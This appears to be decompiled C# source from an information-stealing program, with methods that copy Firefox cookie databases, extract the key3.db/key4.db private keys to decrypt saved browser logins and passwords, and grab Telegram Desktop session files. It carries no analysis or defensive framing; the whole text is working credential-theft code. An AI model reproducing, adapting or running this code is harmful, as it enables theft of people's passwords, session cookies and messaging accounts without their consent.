// Token: 0x0600009B RID: 155 RVA: 0x000066FC File Offset: 0x000048FC
public List <BrowserCookie> GetCookies(string profile)
{
List <BrowserCookie> list = new List <BrowserCookie>();
try
{
string text = Path.Combine(profile, "cookies.sqlite");
if (!File.Exists(text))
{
return(list);
}
SqlConnection sqlConnection = new SqlConnection(RecoveryHelper.CreateTempCopy(text));
sqlConnection.ReadTable("moz_cookies");
int i = 0;
while (i < sqlConnection.GetRowCount())
{
BrowserCookie browserCookie = null;
try
{
browserCookie = new BrowserCookie
{
Host = sqlConnection.GetValue(i, "host").Trim(),
Http = (sqlConnection.GetValue(i, "isSecure") == "1"),
Path = sqlConnection.GetValue(i, "path").Trim(),
Secure = (sqlConnection.GetValue(i, "isSecure") == "1"),
Expires = sqlConnection.GetValue(i, "expiry").Trim(),
Name = sqlConnection.GetValue(i, "name").Trim(),
Value = sqlConnection.GetValue(i, "value")
};
goto IL_118;
}
catch
{
goto IL_118;
}
goto IL_105;
IL_10D:
i++;
continue;
IL_105:
list.Add(browserCookie);
goto IL_10D;
IL_118:
if (browserCookie != null)
{
goto IL_105;
}
goto IL_10D;
}
}
catch (Exception)
{
}
return(list);
}
// Token: 0x0600009A RID: 154 RVA: 0x00006668 File Offset: 0x00004868
public List <BrowserCredendtial> GetCredentials(string profile)
{
List <BrowserCredendtial> list = new List <BrowserCredendtial>();
try
{
if (File.Exists(Path.Combine(profile, "key3.db")))
{
list.AddRange(this.GetLogins(profile, this.ExtractPrivateKey3(RecoveryHelper.CreateTempCopy(Path.Combine(profile, "key3.db")))));
}
if (File.Exists(Path.Combine(profile, "key4.db")))
{
list.AddRange(this.GetLogins(profile, this.ExtractPrivateKey4(RecoveryHelper.CreateTempCopy(Path.Combine(profile, "key4.db")))));
}
}
catch (Exception)
{
}
return(list);
}
// Token: 0x060000AC RID: 172 RVA: 0x00007180 File Offset: 0x00005380
public static TelegramSession Extract()
{
TelegramSession telegramSession = new TelegramSession();
try
{
string path = Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"), "AppData\\Roaming\\Telegram Desktop\\tdata");
string path2 = Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"), "AppData\\Roaming\\Telegram Desktop\\tdata\\D877F783D5D3EF8C");
if (!Directory.Exists(path) || !Directory.Exists(path2))
{
return(telegramSession);
}
string[] files = Directory.GetFiles(path, "D877F783D5D3EF8C*");
if (files.Length != 0)
{
byte[] fileData = File.ReadAllBytes(RecoveryHelper.CreateTempCopy(files[0]));
string[] files2 = Directory.GetFiles(path2, "map*");
if (files2.Length != 0)
{
byte[] fileData2 = File.ReadAllBytes(RecoveryHelper.CreateTempCopy(files[0]));
telegramSession.MapFile = new DesktopFile
{
FileData = fileData2,
Filename = new FileInfo(files2[0]).Name
};
telegramSession.RootFile = new DesktopFile
{
FileData = fileData,
Filename = new FileInfo(files[0]).Name
};
}
}
}
catch (Exception)
{
}
return(telegramSession);
}
// Token: 0x0600009C RID: 156 RVA: 0x00006864 File Offset: 0x00004A64
public List <BrowserCredendtial> GetLogins(string profile, byte[] privateKey)
{
List <BrowserCredendtial> list = new List <BrowserCredendtial>();
try
{
string path = RecoveryHelper.CreateTempCopy(Path.Combine(profile, "logins.json"));
if (!File.Exists(path))
{
return(list);
}
GeckoLogin[] logins = File.ReadAllText(path).FromJSON <GeckoRootEntry>().logins;
for (int i = 0; i < logins.Length; i++)
{
GeckoLogin geckoLogin = logins[i];
Asn1Object asn1Object = Asn1Factory.Create(Convert.FromBase64String(geckoLogin.encryptedUsername));
Asn1Object asn1Object2 = Asn1Factory.Create(Convert.FromBase64String(geckoLogin.encryptedPassword));
string text = Regex.Replace(CrytoServiceProvider.Decode(privateKey, asn1Object.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
string text2 = Regex.Replace(CrytoServiceProvider.Decode(privateKey, asn1Object2.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object2.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
BrowserCredendtial browserCredendtial = new BrowserCredendtial
{
URL = (string.IsNullOrEmpty(geckoLogin.hostname) ? "UNKNOWN" : geckoLogin.hostname),
Login = (string.IsNullOrEmpty(text) ? "UNKNOWN" : text),
Password = (string.IsNullOrEmpty(text2) ? "UNKNOWN" : text2)
};
if (browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN")
{
list.Add(browserCredendtial);
}
}
}
catch (Exception)
{
}
return(list);
}